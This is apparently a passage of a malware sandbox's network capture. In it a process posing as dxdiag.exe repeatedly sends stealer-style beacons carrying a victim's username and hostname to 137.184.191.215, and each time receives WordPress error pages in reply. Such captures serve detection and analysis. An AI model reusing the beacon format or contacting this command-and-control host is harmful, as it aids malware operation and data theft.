                              14192.168.2.565327137.184.191.215801900C:\Windows\SysWOW64\dxdiag.exe
                              TimestampBytes transferredDirectionData
                              Oct 1, 2024 07:50:56.579719067 CEST243OUTPOST /index.php/10899 HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 137.184.191.215
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F612A844
                              Content-Length: 153
                              Connection: close
                              Oct 1, 2024 07:50:56.584716082 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 36 00 30 00 37 00 38 00 31 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                              Data Ascii: (ckav.rualfons960781ALFONS-PC0FDD42EE188E931437F4FBE2C
                              Oct 1, 2024 07:50:59.419450998 CEST1236INHTTP/1.0 500 Internal Server Error
                              Date: Tue, 01 Oct 2024 05:50:57 GMT
                              Server: Apache/2.4.52 (Ubuntu)
                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                              Cache-Control: no-cache, must-revalidate, max-age=0
                              Content-Length: 2557
                              Connection: close
                              Content-Type: text/html; charset=UTF-8
                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                              Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                              Oct 1, 2024 07:50:59.419634104 CEST224INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                              Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus
                              Oct 1, 2024 07:50:59.419646978 CEST1236INData Raw: 7b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 30 34 33 39 35 39 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 30 20 30 20 32 70 78 20 23 32 32 37 31 62 31 3b 0a 09 09 09 6f 75 74 6c 69 6e 65 3a 20 32 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73
                              Data Ascii: {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid transparent;}.button {background: #f3f5f6;border: 1px solid #016087;color: #016087;display: inline-block;text-decoration: none;font-size
                              Oct 1, 2024 07:50:59.420183897 CEST142INData Raw: 3d 22 68 74 74 70 73 3a 2f 2f 77 6f 72 64 70 72 65 73 73 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2f 61 72 74 69 63 6c 65 2f 66 61 71 2d 74 72 6f 75 62 6c 65 73 68 6f 6f 74 69 6e 67 2f 22 3e 4c 65 61 72 6e 20 6d 6f 72 65 20 61 62 6f
                              Data Ascii: ="https://wordpress.org/documentation/article/faq-troubleshooting/">Learn more about troubleshooting WordPress.</a></p></div></body></html>


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              15192.168.2.565328137.184.191.215801900C:\Windows\SysWOW64\dxdiag.exe
                              TimestampBytes transferredDirectionData
                              Oct 1, 2024 07:50:59.576778889 CEST243OUTPOST /index.php/10899 HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 137.184.191.215
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F612A844
                              Content-Length: 153
                              Connection: close
                              Oct 1, 2024 07:50:59.581593990 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 36 00 30 00 37 00 38 00 31 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                              Data Ascii: (ckav.rualfons960781ALFONS-PC0FDD42EE188E931437F4FBE2C
                              Oct 1, 2024 07:51:02.151458979 CEST1236INHTTP/1.0 500 Internal Server Error
                              Date: Tue, 01 Oct 2024 05:51:00 GMT
                              Server: Apache/2.4.52 (Ubuntu)
                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                              Cache-Control: no-cache, must-revalidate, max-age=0
                              Content-Length: 2557
                              Connection: close
                              Content-Type: text/html; charset=UTF-8
                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                              Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                              Oct 1, 2024 07:51:02.151524067 CEST224INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                              Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus
                              Oct 1, 2024 07:51:02.151663065 CEST1236INData Raw: 7b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 30 34 33 39 35 39 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 30 20 30 20 32 70 78 20 23 32 32 37 31 62 31 3b 0a 09 09 09 6f 75 74 6c 69 6e 65 3a 20 32 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73
                              Data Ascii: {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid transparent;}.button {background: #f3f5f6;border: 1px solid #016087;color: #016087;display: inline-block;text-decoration: none;font-size
                              Oct 1, 2024 07:51:02.152153969 CEST142INData Raw: 3d 22 68 74 74 70 73 3a 2f 2f 77 6f 72 64 70 72 65 73 73 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2f 61 72 74 69 63 6c 65 2f 66 61 71 2d 74 72 6f 75 62 6c 65 73 68 6f 6f 74 69 6e 67 2f 22 3e 4c 65 61 72 6e 20 6d 6f 72 65 20 61 62 6f
                              Data Ascii: ="https://wordpress.org/documentation/article/faq-troubleshooting/">Learn more about troubleshooting WordPress.</a></p></div></body></html>


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              16192.168.2.565329137.184.191.215801900C:\Windows\SysWOW64\dxdiag.exe
                              TimestampBytes transferredDirectionData
                              Oct 1, 2024 07:51:02.298511982 CEST243OUTPOST /index.php/10899 HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 137.184.191.215
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F612A844
                              Content-Length: 153
                              Connection: close
                              Oct 1, 2024 07:51:02.303353071 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 36 00 30 00 37 00 38 00 31 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                              Data Ascii: (ckav.rualfons960781ALFONS-PC0FDD42EE188E931437F4FBE2C
                              Oct 1, 2024 07:51:04.892303944 CEST1236INHTTP/1.0 500 Internal Server Error
                              Date: Tue, 01 Oct 2024 05:51:02 GMT
                              Server: Apache/2.4.52 (Ubuntu)
                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                              Cache-Control: no-cache, must-revalidate, max-age=0
                              Content-Length: 2557
                              Connection: close
                              Content-Type: text/html; charset=UTF-8
                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                              Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                              Oct 1, 2024 07:51:04.892528057 CEST224INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                              Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus
                              Oct 1, 2024 07:51:04.892538071 CEST1236INData Raw: 7b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 30 34 33 39 35 39 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 30 20 30 20 32 70 78 20 23 32 32 37 31 62 31 3b 0a 09 09 09 6f 75 74 6c 69 6e 65 3a 20 32 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73
                              Data Ascii: {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid transparent;}.button {background: #f3f5f6;border: 1px solid #016087;color: #016087;display: inline-block;text-decoration: none;font-size
                              Oct 1, 2024 07:51:04.893064976 CEST142INData Raw: 3d 22 68 74 74 70 73 3a 2f 2f 77 6f 72 64 70 72 65 73 73 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2f 61 72 74 69 63 6c 65 2f 66 61 71 2d 74 72 6f 75 62 6c 65 73 68 6f 6f 74 69 6e 67 2f 22 3e 4c 65 61 72 6e 20 6d 6f 72 65 20 61 62 6f
                              Data Ascii: ="https://wordpress.org/documentation/article/faq-troubleshooting/">Learn more about troubleshooting WordPress.</a></p></div></body></html>


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              17192.168.2.565330137.184.191.215801900C:\Windows\SysWOW64\dxdiag.exe
                              TimestampBytes transferredDirectionData
                              Oct 1, 2024 07:51:05.045274973 CEST243OUTPOST /index.php/10899 HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 137.184.191.215
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F612A844
                              Content-Length: 153
                              Connection: close
                              Oct 1, 2024 07:51:05.050082922 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 36 00 30 00 37 00 38 00 31 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                              Data Ascii: (ckav.rualfons960781ALFONS-PC0FDD42EE188E931437F4FBE2C
                              Oct 1, 2024 07:51:07.676932096 CEST1236INHTTP/1.0 500 Internal Server Error
                              Date: Tue, 01 Oct 2024 05:51:05 GMT
                              Server: Apache/2.4.52 (Ubuntu)
                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                              Cache-Control: no-cache, must-revalidate, max-age=0
                              Content-Length: 2557
                              Connection: close
                              Content-Type: text/html; charset=UTF-8
                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                              Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                              Oct 1, 2024 07:51:07.676955938 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                              Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                              Oct 1, 2024 07:51:07.676969051 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                              Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              18192.168.2.565331137.184.191.215801900C:\Windows\SysWOW64\dxdiag.exe
                              TimestampBytes transferredDirectionData
                              Oct 1, 2024 07:51:07.825886011 CEST243OUTPOST /index.php/10899 HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 137.184.191.215
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F612A844
                              Content-Length: 153
                              Connection: close
                              Oct 1, 2024 07:51:07.830750942 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 36 00 30 00 37 00 38 00 31 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                              Data Ascii: (ckav.rualfons960781ALFONS-PC0FDD42EE188E931437F4FBE2C
                              Oct 1, 2024 07:51:10.437975883 CEST1236INHTTP/1.0 500 Internal Server Error
                              Date: Tue, 01 Oct 2024 05:51:08 GMT
                              Server: Apache/2.4.52 (Ubuntu)
                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                              Cache-Control: no-cache, must-revalidate, max-age=0
                              Content-Length: 2557
                              Connection: close
                              Content-Type: text/html; charset=UTF-8
                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                              Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                              Oct 1, 2024 07:51:10.438101053 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                              Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                              Oct 1, 2024 07:51:10.438112020 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                              Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              19192.168.2.565332137.184.191.215801900C:\Windows\SysWOW64\dxdiag.exe
                              TimestampBytes transferredDirectionData
                              Oct 1, 2024 07:51:10.599240065 CEST243OUTPOST /index.php/10899 HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 137.184.191.215
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F612A844
                              Content-Length: 153
                              Connection: close
                              Oct 1, 2024 07:51:10.603998899 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 36 00 30 00 37 00 38 00 31 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                              Data Ascii: (ckav.rualfons960781ALFONS-PC0FDD42EE188E931437F4FBE2C
                              Oct 1, 2024 07:51:13.143502951 CEST1236INHTTP/1.0 500 Internal Server Error
                              Date: Tue, 01 Oct 2024 05:51:11 GMT
                              Server: Apache/2.4.52 (Ubuntu)
                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                              Cache-Control: no-cache, must-revalidate, max-age=0
                              Content-Length: 2557
                              Connection: close
                              Content-Type: text/html; charset=UTF-8
